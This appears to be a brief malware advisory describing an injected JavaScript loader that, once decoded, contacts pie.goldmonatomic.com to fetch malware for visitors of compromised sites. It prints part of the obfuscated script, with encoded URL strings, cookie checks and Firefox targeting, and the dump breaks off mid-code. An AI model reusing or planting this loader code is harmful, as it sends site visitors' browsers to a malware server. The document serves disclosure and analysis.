Description:Malicious javascript (or iframe) to load malware from multiple domains. After decoded, it
connects to pie.goldmonatomic.com to get the piece of malware to be used. This attack is managed by publifacil.org.
Affecting: Any web site (no specific target).
Malware dump:
var a=false;if(document.cookie.indexOf("langs")==-1){dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="langs="+escape("langs")+";expires="+dt.toGMTString()+";path=/";df="XXHHDC".replace(/D/g,"u0070u0069u0065u002Eu0067u006Fu006Cu0064u006Du006Fu006Eu0061u0074u006Fu006Du0069u0063u002Eu0063u006Fu006D").replace(/XX/g,"x68x74x74").replace(/HH/g,"x70x3Ax2Fx2F").replace(/C/g,"x2Fx69x6Ex2Ex63x67x69x3Fx32");if(window.navigator.userAgent.toLowerCase().match(/Firefox/i)){var m=function(){};m.prototype={b:function(){i=43724;this.w="";u="u";return df},a:function(){q="q";dN=49709;this.J=46019;w="";rJ=a;this.j="";var e=document;cR=kQ=a;this.oa= "";var f=window;dO="";var d=this;this....